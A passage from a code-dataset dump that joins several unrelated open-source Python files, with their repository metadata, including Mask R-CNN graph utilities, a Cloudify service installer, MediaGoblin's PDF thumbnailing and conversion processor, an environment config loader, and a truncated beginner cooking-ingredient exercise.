searched to avoid loops in traversing the graph.
"""
checked = checked if checked is not None else []
# Put a limit on how deep we go to avoid very long loops
if len(checked) > 500:
return None
# Convert name to a regex and allow matching a number prefix
# because Keras adds them automatically
if isinstance(name, str):
name = re.compile(name.replace("/", r"(\_\d+)*/"))
parents = tensor.op.inputs
for p in parents:
if p in checked:
continue
if bool(re.fullmatch(name, p.name)):
return p
checked.append(p)
a = self.ancestor(p, name, checked)
if a is not None:
return a
return None
def find_trainable_layer(self, layer):
"""If a layer is encapsulated by another layer, this function
digs through the encapsulation and returns the layer that holds
the weights.
"""
if layer.__class__.__name__ == 'TimeDistributed':
return self.find_trainable_layer(layer.layer)
return layer
def get_trainable_layers(self):
"""Returns a list of layers that have weights."""
layers = []
# Loop through all layers
for l in self.keras_model.layers:
# If layer is a wrapper, find inner trainable layer
l = self.find_trainable_layer(l)
# Include layer if it has weights
if l.get_weights():
layers.append(l)
return layers
def run_graph(self, images, outputs, image_metas=None):
"""Runs a sub-set of the computation graph that computes the given
outputs.
image_metas: If provided, the images are assumed to be already
molded (i.e. resized, padded, and normalized)
outputs: List of tuples (name, tensor) to compute. The tensors are
symbolic TensorFlow tensors and the names are for easy tracking.
Returns an ordered dict of results. Keys are the names received in the
input and values are Numpy arrays.
"""
model = self.keras_model
# Organize desired outputs into an ordered dict
outputs = OrderedDict(outputs)
for o in outputs.values():
assert o is not None
# Build a Keras function to run parts of the computation graph
inputs = model.inputs
# if model.uses_learning_phase and not isinstance(K.learning_phase(), int):
# inputs += [K.learning_phase()]
kf = K.function(model.inputs, list(outputs.values()))
# Prepare inputs
if image_metas is None:
molded_images, image_metas, _ = self.mold_inputs(images)
else:
molded_images = images
image_shape = molded_images[0].shape
# Anchors
anchors = self.get_anchors(image_shape)
# Duplicate across the batch dimension because Keras requires it
# TODO: can this be optimized to avoid duplicating the anchors?
anchors = np.broadcast_to(anchors, (self.config.BATCH_SIZE,) + anchors.shape)
model_in = [molded_images, image_metas, anchors]
# Run inference
# if model.uses_learning_phase and not isinstance(K.learning_phase(), int):
# model_in.append(0.)
outputs_np = kf(model_in)
        # Pack the generated Numpy arrays into a dict and log the results.
outputs_np = OrderedDict([(k, v)
for k, v in zip(outputs.keys(), outputs_np)])
for k, v in outputs_np.items():
log(k, v)
return outputs_np
############################################################
# Data Formatting
############################################################
def compose_image_meta(image_id, original_image_shape, image_shape,
window, scale, active_class_ids):
"""Takes attributes of an image and puts them in one 1D array.
image_id: An int ID of the image. Useful for debugging.
original_image_shape: [H, W, C] before resizing or padding.
image_shape: [H, W, C] after resizing and padding
window: (y1, x1, y2, x2) in pixels. The area of the image where the real
image is (excluding the padding)
scale: The scaling factor applied to the original image (float32)
active_class_ids: List of class_ids available in the dataset from which
the image came. Useful if training on images from multiple datasets
where not all classes are present in all datasets.
"""
meta = np.array(
[image_id] + # size=1
list(original_image_shape) + # size=3
list(image_shape) + # size=3
        list(window) +                # size=4 (y1, x1, y2, x2) in image coordinates
[scale] + # size=1
list(active_class_ids) # size=num_classes
)
return meta
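# Note: the packed meta vector has length 1 + 3 + 3 + 4 + 1 + NUM_CLASSES
# = 12 + NUM_CLASSES, which the slicing in parse_image_meta() and
# parse_image_meta_graph() below relies on (and which config.IMAGE_META_SIZE
# is expected to match).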
def parse_image_meta(meta):
"""Parses an array that contains image attributes to its components.
See compose_image_meta() for more details.
meta: [batch, meta length] where meta length depends on NUM_CLASSES
Returns a dict of the parsed values.
"""
image_id = meta[:, 0]
original_image_shape = meta[:, 1:4]
image_shape = meta[:, 4:7]
    window = meta[:, 7:11]  # (y1, x1, y2, x2) window of image in pixels
scale = meta[:, 11]
active_class_ids = meta[:, 12:]
return {
"image_id": image_id.astype(np.int32),
"original_image_shape": original_image_shape.astype(np.int32),
"image_shape": image_shape.astype(np.int32),
"window": window.astype(np.int32),
"scale": scale.astype(np.float32),
"active_class_ids": active_class_ids.astype(np.int32),
}
def parse_image_meta_graph(meta):
"""Parses a tensor that contains image attributes to its components.
See compose_image_meta() for more details.
meta: [batch, meta length] where meta length depends on NUM_CLASSES
Returns a dict of the parsed tensors.
"""
image_id = meta[:, 0]
original_image_shape = meta[:, 1:4]
image_shape = meta[:, 4:7]
    window = meta[:, 7:11]  # (y1, x1, y2, x2) window of image in pixels
scale = meta[:, 11]
active_class_ids = meta[:, 12:]
return {
"image_id": image_id,
"original_image_shape": original_image_shape,
"image_shape": image_shape,
"window": window,
"scale": scale,
"active_class_ids": active_class_ids,
}
def mold_image(images, config):
"""Expects an RGB image (or array of images) and subtracts
the mean pixel and converts it to float. Expects image
colors in RGB order.
"""
return images.astype(np.float32) - config.MEAN_PIXEL
def unmold_image(normalized_images, config):
"""Takes a image normalized with mold() and returns the original."""
return (normalized_images + config.MEAN_PIXEL).astype(np.uint8)
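# --- Illustrative example (not part of the original Mask R-CNN code) ---
# A small sketch of the mold_image()/unmold_image() pair. The config object
# and its MEAN_PIXEL value below are hypothetical stand-ins for the real
# Config class used by this module.
def _example_mold_unmold():
    import numpy as np
    class _FakeConfig(object):
        MEAN_PIXEL = np.array([123.7, 116.8, 103.9])
    config = _FakeConfig()
    image = np.full((2, 2, 3), 128, dtype=np.uint8)   # tiny dummy RGB image
    molded = mold_image(image, config)       # float, zero-centered
    restored = unmold_image(molded, config)  # approximately the original uint8
    assert molded.shape == image.shape
    assert restored.dtype == np.uint8
    return molded, restored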
############################################################
# Miscellaneous Graph Functions
############################################################
def trim_zeros_graph(boxes, name='trim_zeros'):
"""Often boxes are represented with matrices of shape [N, 4] and
are padded with zeros. This removes zero boxes.
    boxes: [N, 4] matrix of boxes.
    Returns:
    boxes: the input boxes with all-zero rows removed.
    non_zeros: [N] 1D boolean mask identifying the rows that were kept.
"""
non_zeros = tf.cast(tf.reduce_sum(input_tensor=tf.abs(boxes), axis=1), tf.bool)
boxes = tf.boolean_mask(tensor=boxes, mask=non_zeros, name=name)
return boxes, non_zeros
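# --- Illustrative example (not part of the original Mask R-CNN code) ---
# A minimal sketch, assuming TensorFlow 2.x eager execution, of how
# trim_zeros_graph() drops zero-padded rows from a box tensor.
def _example_trim_zeros():
    import tensorflow as tf
    padded = tf.constant([[10., 10., 50., 50.],
                          [0., 0., 0., 0.],
                          [20., 30., 40., 60.]])
    boxes, non_zeros = trim_zeros_graph(padded)
    # boxes -> [[10, 10, 50, 50], [20, 30, 40, 60]]
    # non_zeros -> [True, False, True]
    return boxes, non_zeros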
def batch_pack_graph(x, counts, num_rows):
"""Picks different number of values from each row
in x depending on the values in counts.
"""
outputs = []
for i in range(num_rows):
outputs.append(x[i, :counts[i]])
return tf.concat(outputs, axis=0)
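# --- Illustrative example (not part of the original Mask R-CNN code) ---
# A short sketch, assuming TensorFlow 2.x eager execution, of how
# batch_pack_graph() gathers a per-row prefix from x and concatenates them.
def _example_batch_pack():
    import tensorflow as tf
    x = tf.constant([[1, 2, 3],
                     [4, 5, 6]])
    counts = [2, 1]
    packed = batch_pack_graph(x, counts, num_rows=2)
    # packed -> [1, 2, 4]
    return packed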
def norm_boxes_graph(boxes, shape):
"""Converts boxes from pixel coordinates to normalized coordinates.
boxes: [..., (y1, x1, y2, x2)] in pixel coordinates
shape: [..., (height, width)] in pixels
Note: In pixel coordinates (y2, x2) is outside the box. But in normalized
coordinates it's inside the box.
Returns:
[..., (y1, x1, y2, x2)] in normalized coordinates
"""
h, w = tf.split(tf.cast(shape, tf.float32), 2)
scale = tf.concat([h, w, h, w], axis=-1) - tf.constant(1.0)
shift = tf.constant([0., 0., 1., 1.])
return tf.divide(boxes - shift, scale)
def denorm_boxes_graph(boxes, shape):
"""Converts boxes from normalized coordinates to pixel coordinates.
boxes: [..., (y1, x1, y2, x2)] in normalized coordinates
shape: [..., (height, width)] in pixels
Note: In pixel coordinates (y2, x2) is outside the box. But in normalized
coordinates it's inside the box.
Returns:
[..., (y1, x1, y2, x2)] in pixel coordinates
"""
h, w = tf.split(tf.cast(shape, tf.float32), 2)
scale = tf.concat([h, w, h, w], axis=-1) - tf.constant(1.0)
shift = tf.constant([0., 0., 1., 1.])
return tf.cast(tf.round(tf.multiply(boxes, scale) + shift), tf.int32)
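# --- Illustrative example (not part of the original Mask R-CNN code) ---
# A short sketch, assuming TensorFlow 2.x eager execution, showing that
# norm_boxes_graph() and denorm_boxes_graph() invert each other for a
# hypothetical 1024x1024 image.
def _example_box_normalization_roundtrip():
    import tensorflow as tf
    shape = tf.constant([1024, 1024])
    boxes_px = tf.constant([[0., 0., 1023., 1023.],
                            [100., 200., 300., 400.]])
    normalized = norm_boxes_graph(boxes_px, shape)    # values in [0, 1]
    restored = denorm_boxes_graph(normalized, shape)  # back to pixel coords
    # restored -> [[0, 0, 1023, 1023], [100, 200, 300, 400]] (int32)
    return normalized, restored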
| 44.315789
| 115
| 0.613015
|
d0dc3b3be21bc4da5f2bab824a06a0c325eb6e88
| 2,064
|
py
|
Python
|
components/amqpinflux/scripts/create.py
|
cloudify-cosmo/cloudify-manager-blueprints
|
1908c1a0615fb15cbb118335aa2f9e055b9e5779
|
[
"Apache-2.0"
] | 35
|
2015-03-07T13:30:58.000Z
|
2022-02-14T11:44:48.000Z
|
components/amqpinflux/scripts/create.py
|
cloudify-cosmo/cloudify-manager-blueprints
|
1908c1a0615fb15cbb118335aa2f9e055b9e5779
|
[
"Apache-2.0"
] | 101
|
2015-03-18T03:07:57.000Z
|
2019-02-07T12:06:42.000Z
|
components/amqpinflux/scripts/create.py
|
cloudify-cosmo/cloudify-manager-blueprints
|
1908c1a0615fb15cbb118335aa2f9e055b9e5779
|
[
"Apache-2.0"
] | 76
|
2015-01-08T10:33:03.000Z
|
2021-05-11T08:45:50.000Z
|
#!/usr/bin/env python
import os
from os.path import join, dirname
from cloudify import ctx
ctx.download_resource(
join('components', 'utils.py'),
join(dirname(__file__), 'utils.py'))
import utils # NOQA
SERVICE_NAME = 'amqpinflux'
# Some runtime properties to be used in teardown
runtime_props = ctx.instance.runtime_properties
runtime_props['service_name'] = SERVICE_NAME
AMQPINFLUX_USER = SERVICE_NAME
AMQPINFLUX_GROUP = SERVICE_NAME
runtime_props['service_user'] = AMQPINFLUX_USER
runtime_props['service_group'] = AMQPINFLUX_GROUP
HOME_DIR = join('/opt', SERVICE_NAME)
runtime_props['files_to_remove'] = [HOME_DIR]
ctx_properties = ctx.node.properties.get_all()
def _install_optional(amqpinflux_venv):
ctx.logger.info('Installing optional modules...')
amqpinflux_source_url = ctx_properties['amqpinflux_module_source_url']
    # this allows upgrading amqpinflux if necessary.
if amqpinflux_source_url:
utils.install_python_package(amqpinflux_source_url, amqpinflux_venv)
def install_amqpinflux():
amqpinflux_rpm_source_url = \
ctx_properties['amqpinflux_rpm_source_url']
# injected as an input to the script
ctx.instance.runtime_properties['influxdb_endpoint_ip'] = \
os.environ['INFLUXDB_ENDPOINT_IP']
ctx.instance.runtime_properties['rabbitmq_endpoint_ip'] = \
utils.get_rabbitmq_endpoint_ip()
amqpinflux_venv = '{0}/env'.format(HOME_DIR)
    ctx.logger.info('Installing AMQPInflux...')
utils.set_selinux_permissive()
utils.copy_notice(SERVICE_NAME)
utils.mkdir(HOME_DIR)
utils.yum_install(amqpinflux_rpm_source_url,
service_name=SERVICE_NAME)
_install_optional(amqpinflux_venv)
ctx.logger.info('Configuring AMQPInflux...')
utils.create_service_user(AMQPINFLUX_USER, AMQPINFLUX_GROUP, HOME_DIR)
ctx.instance.runtime_properties['broker_cert_path'] = \
utils.INTERNAL_CA_CERT_PATH
utils.chown(AMQPINFLUX_USER, AMQPINFLUX_GROUP, HOME_DIR)
utils.systemd.configure(SERVICE_NAME)
install_amqpinflux()
| 29.913043
| 76
| 0.758721
|
3792cfbda571c1aaf89c6eeb338e53fc010f79a7
| 17,009
|
py
|
Python
|
mediagoblin/media_types/pdf/processing.py
|
eliroca/mediagoblin-imported
|
c4599508b02f2e61df3a97ff314766a62a3e5934
|
[
"CC0-1.0"
] | 1
|
2021-09-21T02:24:43.000Z
|
2021-09-21T02:24:43.000Z
|
mediagoblin/media_types/pdf/processing.py
|
jgarte/mediagoblin-mirror
|
c4599508b02f2e61df3a97ff314766a62a3e5934
|
[
"CC0-1.0"
] | null | null | null |
mediagoblin/media_types/pdf/processing.py
|
jgarte/mediagoblin-mirror
|
c4599508b02f2e61df3a97ff314766a62a3e5934
|
[
"CC0-1.0"
] | 1
|
2021-09-21T02:25:20.000Z
|
2021-09-21T02:25:20.000Z
|
# GNU MediaGoblin -- federated, autonomous media hosting
# Copyright (C) 2011, 2012 MediaGoblin contributors. See AUTHORS.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import argparse
import os
import logging
import dateutil.parser
from subprocess import PIPE, Popen
from mediagoblin import mg_globals as mgg
from mediagoblin.processing import (
FilenameBuilder, BadMediaFail,
MediaProcessor, ProcessingManager,
request_from_args, get_process_filename,
store_public, copy_original)
from mediagoblin.tools.translate import fake_ugettext_passthrough as _
_log = logging.getLogger(__name__)
MEDIA_TYPE = 'mediagoblin.media_types.pdf'
# TODO - cache (memoize) util
# This is a list created via unoconv --show, hand-removing some types that
# we already support better via other media types.
unoconv_supported = [
'bib', # - BibTeX [.bib]
#bmp - Windows Bitmap [.bmp]
'csv', # - Text CSV [.csv]
'dbf', # - dBASE [.dbf]
'dif', # - Data Interchange Format [.dif]
'doc6', # - Microsoft Word 6.0 [.doc]
'doc95', # - Microsoft Word 95 [.doc]
'docbook', # - DocBook [.xml]
'doc', # - Microsoft Word 97/2000/XP [.doc]
'docx7', # - Microsoft Office Open XML [.docx]
'docx', # - Microsoft Office Open XML [.docx]
#emf - Enhanced Metafile [.emf]
'eps', # - Encapsulated PostScript [.eps]
'fodp', # - OpenDocument Presentation (Flat XML) [.fodp]
'fods', # - OpenDocument Spreadsheet (Flat XML) [.fods]
'fodt', # - OpenDocument Text (Flat XML) [.fodt]
#gif - Graphics Interchange Format [.gif]
'html', # - HTML Document (OpenOffice.org Writer) [.html]
#jpg - Joint Photographic Experts Group [.jpg]
'latex', # - LaTeX 2e [.ltx]
'mediawiki', # - MediaWiki [.txt]
'met', # - OS/2 Metafile [.met]
'odd', # - OpenDocument Drawing [.odd]
'odg', # - ODF Drawing (Impress) [.odg]
'odp', # - ODF Presentation [.odp]
'ods', # - ODF Spreadsheet [.ods]
'odt', # - ODF Text Document [.odt]
'ooxml', # - Microsoft Office Open XML [.xml]
'otg', # - OpenDocument Drawing Template [.otg]
'otp', # - ODF Presentation Template [.otp]
'ots', # - ODF Spreadsheet Template [.ots]
'ott', # - Open Document Text [.ott]
#pbm - Portable Bitmap [.pbm]
#pct - Mac Pict [.pct]
'pdb', # - AportisDoc (Palm) [.pdb]
#pdf - Portable Document Format [.pdf]
#pgm - Portable Graymap [.pgm]
#png - Portable Network Graphic [.png]
'pot', # - Microsoft PowerPoint 97/2000/XP Template [.pot]
'potm', # - Microsoft PowerPoint 2007/2010 XML Template [.potm]
#ppm - Portable Pixelmap [.ppm]
'pps', # - Microsoft PowerPoint 97/2000/XP (Autoplay) [.pps]
'ppt', # - Microsoft PowerPoint 97/2000/XP [.ppt]
'pptx', # - Microsoft PowerPoint 2007/2010 XML [.pptx]
'psw', # - Pocket Word [.psw]
'pwp', # - PlaceWare [.pwp]
'pxl', # - Pocket Excel [.pxl]
#ras - Sun Raster Image [.ras]
'rtf', # - Rich Text Format [.rtf]
'sda', # - StarDraw 5.0 (OpenOffice.org Impress) [.sda]
'sdc3', # - StarCalc 3.0 [.sdc]
'sdc4', # - StarCalc 4.0 [.sdc]
'sdc', # - StarCalc 5.0 [.sdc]
'sdd3', # - StarDraw 3.0 (OpenOffice.org Impress) [.sdd]
'sdd4', # - StarImpress 4.0 [.sdd]
'sdd', # - StarImpress 5.0 [.sdd]
'sdw3', # - StarWriter 3.0 [.sdw]
'sdw4', # - StarWriter 4.0 [.sdw]
'sdw', # - StarWriter 5.0 [.sdw]
'slk', # - SYLK [.slk]
'stc', # - OpenOffice.org 1.0 Spreadsheet Template [.stc]
'std', # - OpenOffice.org 1.0 Drawing Template [.std]
'sti', # - OpenOffice.org 1.0 Presentation Template [.sti]
'stw', # - Open Office.org 1.0 Text Document Template [.stw]
#svg - Scalable Vector Graphics [.svg]
'svm', # - StarView Metafile [.svm]
'swf', # - Macromedia Flash (SWF) [.swf]
'sxc', # - OpenOffice.org 1.0 Spreadsheet [.sxc]
'sxd3', # - StarDraw 3.0 [.sxd]
'sxd5', # - StarDraw 5.0 [.sxd]
'sxd', # - OpenOffice.org 1.0 Drawing (OpenOffice.org Impress) [.sxd]
'sxi', # - OpenOffice.org 1.0 Presentation [.sxi]
'sxw', # - Open Office.org 1.0 Text Document [.sxw]
#text - Text Encoded [.txt]
#tiff - Tagged Image File Format [.tiff]
#txt - Text [.txt]
'uop', # - Unified Office Format presentation [.uop]
'uos', # - Unified Office Format spreadsheet [.uos]
'uot', # - Unified Office Format text [.uot]
'vor3', # - StarDraw 3.0 Template (OpenOffice.org Impress) [.vor]
'vor4', # - StarWriter 4.0 Template [.vor]
'vor5', # - StarDraw 5.0 Template (OpenOffice.org Impress) [.vor]
'vor', # - StarCalc 5.0 Template [.vor]
#wmf - Windows Metafile [.wmf]
'xhtml', # - XHTML Document [.html]
'xls5', # - Microsoft Excel 5.0 [.xls]
'xls95', # - Microsoft Excel 95 [.xls]
'xls', # - Microsoft Excel 97/2000/XP [.xls]
'xlt5', # - Microsoft Excel 5.0 Template [.xlt]
'xlt95', # - Microsoft Excel 95 Template [.xlt]
'xlt', # - Microsoft Excel 97/2000/XP Template [.xlt]
#xpm - X PixMap [.xpm]
]
def is_unoconv_working():
# TODO: must have libreoffice-headless installed too, need to check for it
unoconv = where('unoconv')
if not unoconv:
return False
try:
proc = Popen([unoconv, '--show'], stderr=PIPE)
output = proc.stderr.read()
except OSError:
_log.warn(_('unoconv failing to run, check log file'))
return False
if b'ERROR' in output:
return False
return True
def supported_extensions(cache=[None]):
    if cache[0] is None:
cache[0] = 'pdf'
if is_unoconv_working():
cache.extend(unoconv_supported)
return cache
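# --- Illustrative note (not part of the original MediaGoblin module) ---
# supported_extensions() memoizes its result in its mutable default argument:
# the first call fills the list (probing unoconv once), later calls return the
# very same list object.
def _example_supported_extensions_cache():
    first = supported_extensions()
    second = supported_extensions()
    assert first is second    # both calls share the cached list
    assert first[0] == 'pdf'  # plain pdf is always supported
    return first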
def where(name):
for p in os.environ['PATH'].split(os.pathsep):
fullpath = os.path.join(p, name)
if os.path.exists(fullpath):
return fullpath
return None
def check_prerequisites():
if not where('pdfinfo'):
_log.warn('missing pdfinfo')
return False
if not where('pdftocairo'):
        _log.warn('missing pdftocairo')
return False
return True
def sniff_handler(media_file, filename):
_log.info('Sniffing {}'.format(MEDIA_TYPE))
if not check_prerequisites():
return None
name, ext = os.path.splitext(filename)
clean_ext = ext[1:].lower()
if clean_ext in supported_extensions():
return MEDIA_TYPE
def create_pdf_thumb(original, thumb_filename, width, height):
# Note: pdftocairo adds '.png', remove it
thumb_filename = thumb_filename[:-4]
executable = where('pdftocairo')
args = [executable, '-scale-to', str(min(width, height)),
'-singlefile', '-png', original, thumb_filename]
_log.debug('calling {}'.format(repr(' '.join(args))))
Popen(executable=executable, args=args).wait()
def pdf_info(original):
"""
Extract dictionary of pdf information. This could use a library instead
of a process.
Note: I'm assuming pdfinfo output is sanitized (integers where integers are
expected, etc.) - if this is wrong then an exception will be raised and caught
leading to the dreaded error page. It seems a safe assumption.
"""
ret_dict = {}
pdfinfo = where('pdfinfo')
try:
proc = Popen(executable=pdfinfo,
args=[pdfinfo, original], stdout=PIPE)
lines = proc.stdout.readlines()
except OSError:
_log.debug('pdfinfo could not read the pdf file.')
raise BadMediaFail()
lines = [l.decode('utf-8', 'replace') for l in lines]
info_dict = dict([[part.strip() for part in l.strip().split(':', 1)]
for l in lines if ':' in l])
if 'Page size' not in info_dict.keys():
        # TODO - message is for the user, not debug, but BadMediaFail does not take an argument; fix that.
_log.debug('Missing "Page size" key in returned pdf - conversion failed?')
raise BadMediaFail()
for date_key in [('pdf_mod_date', 'ModDate'),
('pdf_creation_date', 'CreationDate')]:
if date_key in info_dict:
ret_dict[date_key] = dateutil.parser.parse(info_dict[date_key])
for db_key, int_key in [('pdf_pages', 'Pages')]:
if int_key in info_dict:
ret_dict[db_key] = int(info_dict[int_key])
    # parse the 'Page size' field, e.g.: 595 x 842 pts (A4)
page_size_parts = info_dict['Page size'].split()
ret_dict['pdf_page_size_width'] = float(page_size_parts[0])
ret_dict['pdf_page_size_height'] = float(page_size_parts[2])
for db_key, str_key in [('pdf_keywords', 'Keywords'),
('pdf_creator', 'Creator'), ('pdf_producer', 'Producer'),
('pdf_author', 'Author'), ('pdf_title', 'Title')]:
ret_dict[db_key] = info_dict.get(str_key, None)
ret_dict['pdf_version_major'], ret_dict['pdf_version_minor'] = \
map(int, info_dict['PDF version'].split('.'))
return ret_dict
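# --- Illustrative sketch (not part of the original MediaGoblin module) ---
# pdf_info() shells out to pdfinfo; the helper below reproduces only its
# parsing step on a hand-written, hypothetical pdfinfo output, so the
# key/value splitting and the 'Page size' handling can be seen in isolation.
def _example_parse_pdfinfo_output():
    sample = [
        "Title:          Example document",
        "Pages:          3",
        "Page size:      595 x 842 pts (A4)",
        "PDF version:    1.4",
    ]
    info_dict = dict([[part.strip() for part in l.split(':', 1)]
                      for l in sample if ':' in l])
    page_size_parts = info_dict['Page size'].split()
    width = float(page_size_parts[0])   # 595.0
    height = float(page_size_parts[2])  # 842.0
    major, minor = map(int, info_dict['PDF version'].split('.'))
    return width, height, major, minor, int(info_dict['Pages'])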
class CommonPdfProcessor(MediaProcessor):
"""
Provides a base for various pdf processing steps
"""
acceptable_files = ['original', 'pdf']
def common_setup(self):
"""
Set up common pdf processing steps
"""
# Pull down and set up the processing file
self.process_filename = get_process_filename(
self.entry, self.workbench, self.acceptable_files)
self.name_builder = FilenameBuilder(self.process_filename)
self._set_pdf_filename()
def _set_pdf_filename(self):
if self.name_builder.ext == '.pdf':
self.pdf_filename = self.process_filename
elif self.entry.media_files.get('pdf'):
self.pdf_filename = self.workbench.localized_file(
mgg.public_store, self.entry.media_files['pdf'])
else:
self.pdf_filename = self._generate_pdf()
def _skip_processing(self, keyname, **kwargs):
file_metadata = self.entry.get_file_metadata(keyname)
skip = True
if not file_metadata:
return False
if keyname == 'thumb':
if kwargs.get('thumb_size') != file_metadata.get('thumb_size'):
skip = False
elif keyname == 'medium':
if kwargs.get('size') != file_metadata.get('size'):
skip = False
return skip
def copy_original(self):
copy_original(
self.entry, self.process_filename,
self.name_builder.fill('{basename}{ext}'))
def generate_thumb(self, thumb_size=None):
if not thumb_size:
thumb_size = (mgg.global_config['media:thumb']['max_width'],
mgg.global_config['media:thumb']['max_height'])
if self._skip_processing('thumb', thumb_size=thumb_size):
return
# Note: pdftocairo adds '.png', so don't include an ext
thumb_filename = os.path.join(self.workbench.dir,
self.name_builder.fill(
'{basename}.thumbnail'))
executable = where('pdftocairo')
args = [executable, '-scale-to', str(min(thumb_size)),
'-singlefile', '-png', self.pdf_filename, thumb_filename]
_log.debug('calling {}'.format(repr(' '.join(args))))
Popen(executable=executable, args=args).wait()
# since pdftocairo added '.png', we need to include it with the
# filename
store_public(self.entry, 'thumb', thumb_filename + '.png',
self.name_builder.fill('{basename}.thumbnail.png'))
self.entry.set_file_metadata('thumb', thumb_size=thumb_size)
def _generate_pdf(self):
"""
Store the pdf. If the file is not a pdf, make it a pdf
"""
tmp_pdf = os.path.splitext(self.process_filename)[0] + '.pdf'
unoconv = where('unoconv')
args = [unoconv, '-v', '-f', 'pdf', self.process_filename]
_log.debug('calling %s' % repr(args))
Popen(executable=unoconv,
args=args).wait()
if not os.path.exists(tmp_pdf):
_log.debug('unoconv failed to convert file to pdf')
raise BadMediaFail()
store_public(self.entry, 'pdf', tmp_pdf,
self.name_builder.fill('{basename}.pdf'))
return self.workbench.localized_file(
mgg.public_store, self.entry.media_files['pdf'])
def extract_pdf_info(self):
pdf_info_dict = pdf_info(self.pdf_filename)
self.entry.media_data_init(**pdf_info_dict)
def generate_medium(self, size=None):
if not size:
size = (mgg.global_config['media:medium']['max_width'],
mgg.global_config['media:medium']['max_height'])
if self._skip_processing('medium', size=size):
return
# Note: pdftocairo adds '.png', so don't include an ext
filename = os.path.join(self.workbench.dir,
self.name_builder.fill('{basename}.medium'))
executable = where('pdftocairo')
args = [executable, '-scale-to', str(min(size)),
'-singlefile', '-png', self.pdf_filename, filename]
_log.debug('calling {}'.format(repr(' '.join(args))))
Popen(executable=executable, args=args).wait()
# since pdftocairo added '.png', we need to include it with the
# filename
store_public(self.entry, 'medium', filename + '.png',
self.name_builder.fill('{basename}.medium.png'))
self.entry.set_file_metadata('medium', size=size)
class InitialProcessor(CommonPdfProcessor):
"""
Initial processing step for new pdfs
"""
name = "initial"
description = "Initial processing"
@classmethod
def media_is_eligible(cls, entry=None, state=None):
"""
Determine if this media type is eligible for processing
"""
if not state:
state = entry.state
return state in (
"unprocessed", "failed")
@classmethod
def generate_parser(cls):
parser = argparse.ArgumentParser(
description=cls.description,
prog=cls.name)
parser.add_argument(
'--size',
nargs=2,
metavar=('max_width', 'max_height'),
type=int)
parser.add_argument(
'--thumb-size',
nargs=2,
metavar=('max_width', 'max_height'),
type=int)
return parser
@classmethod
def args_to_request(cls, args):
return request_from_args(
args, ['size', 'thumb_size'])
def process(self, size=None, thumb_size=None):
self.common_setup()
self.extract_pdf_info()
self.copy_original()
self.generate_medium(size=size)
self.generate_thumb(thumb_size=thumb_size)
self.delete_queue_file()
class Resizer(CommonPdfProcessor):
"""
Resizing process steps for processed pdfs
"""
name = 'resize'
description = 'Resize thumbnail and medium'
thumb_size = 'size'
@classmethod
def media_is_eligible(cls, entry=None, state=None):
"""
Determine if this media type is eligible for processing
"""
if not state:
state = entry.state
        return state in ('processed',)
@classmethod
def generate_parser(cls):
parser = argparse.ArgumentParser(
description=cls.description,
prog=cls.name)
parser.add_argument(
'--size',
nargs=2,
metavar=('max_width', 'max_height'),
type=int)
parser.add_argument(
'file',
choices=['medium', 'thumb'])
return parser
@classmethod
def args_to_request(cls, args):
return request_from_args(
args, ['size', 'file'])
def process(self, file, size=None):
self.common_setup()
if file == 'medium':
self.generate_medium(size=size)
elif file == 'thumb':
self.generate_thumb(thumb_size=size)
class PdfProcessingManager(ProcessingManager):
def __init__(self):
super().__init__()
self.add_processor(InitialProcessor)
self.add_processor(Resizer)
| 35.959831
| 103
| 0.60274
|
3e17e75c929a40c590d0f9f90fda0af71d75d5bd
| 749
|
py
|
Python
|
creds.py
|
tbass134/audiosocket-demo
|
f6f6dfd426521d649cf023e417386f0725696af1
|
[
"MIT"
] | 28
|
2016-12-16T12:21:21.000Z
|
2022-03-03T15:16:07.000Z
|
creds.py
|
rowisahub/audiosocket-demo
|
1cfc9cdfba6797b31fe1cad7d084ab78bb86125a
|
[
"MIT"
] | 1
|
2016-12-16T16:36:45.000Z
|
2016-12-16T16:36:45.000Z
|
creds.py
|
rowisahub/audiosocket-demo
|
1cfc9cdfba6797b31fe1cad7d084ab78bb86125a
|
[
"MIT"
] | 5
|
2017-02-22T07:39:58.000Z
|
2021-08-04T00:56:35.000Z
|
import logging
import os
class Config(object):
def __init__(self):
self.missing_keys = []
self.api_key = self._load('API_KEY')
self.api_secret = self._load('API_SECRET')
self.app_id = self._load('APP_ID')
self.private_key = self._load('PRIVATE_KEY')
self.phone_number = self._load('PHONE_NUMBER')
self.host = self._load('HOST')
self.port = self._load('PORT', 8000)
def _load(self, key, default=None):
val = os.getenv(key, default)
if val is None:
self.missing_keys.append(key)
logging.error("Missing environment variable %s", key)
return val
@property
def fully_configured(self):
return not self.missing_keys
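# --- Illustrative usage sketch (not part of the original module) ---
# Config pulls its settings from environment variables and records any that
# are missing. The variable values below are hypothetical placeholders; PORT
# is left alone so the default of 8000 is used when it is not set.
if __name__ == '__main__':
    for key, value in [('API_KEY', 'example-key'),
                       ('API_SECRET', 'example-secret'),
                       ('APP_ID', 'example-app'),
                       ('PRIVATE_KEY', 'example.pem'),
                       ('PHONE_NUMBER', '15550001111'),
                       ('HOST', 'localhost')]:
        os.environ.setdefault(key, value)
    config = Config()
    print("port=%s fully_configured=%s" % (config.port, config.fully_configured))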
| 28.807692
| 65
| 0.616822
|
0fbf16d2b3e2220a88b94229d00af1abf33c6e03
| 630
|
py
|
Python
|
Python/Cook book/main.py
|
drtierney/hyperskill-problems
|
b74da993f0ac7bcff1cbd5d89a3a1b06b05f33e0
|
[
"MIT"
] | 5
|
2020-08-29T15:15:31.000Z
|
2022-03-01T18:22:34.000Z
|
Python/Cook book/main.py
|
drtierney/hyperskill-problems
|
b74da993f0ac7bcff1cbd5d89a3a1b06b05f33e0
|
[
"MIT"
] | null | null | null |
Python/Cook book/main.py
|
drtierney/hyperskill-problems
|
b74da993f0ac7bcff1cbd5d89a3a1b06b05f33e0
|
[
"MIT"
] | 1
|
2020-12-02T11:13:14.000Z
|
2020-12-02T11:13:14.000Z
|
pasta = "tomato, basil, garlic, salt, pasta, olive oil"
apple_pie = "apple, sugar, salt, cinnamon, flour, egg, butter"
ratatouille = "aubergine, carrot, onion, tomato, garlic, olive oil, pepper, salt"
chocolate_cake = "chocolate, sugar, salt, flour, coffee, butter"
omelette = "egg, milk, bacon, tomato, salt, pepper"
ingredient = input()
if ingredient in pasta:
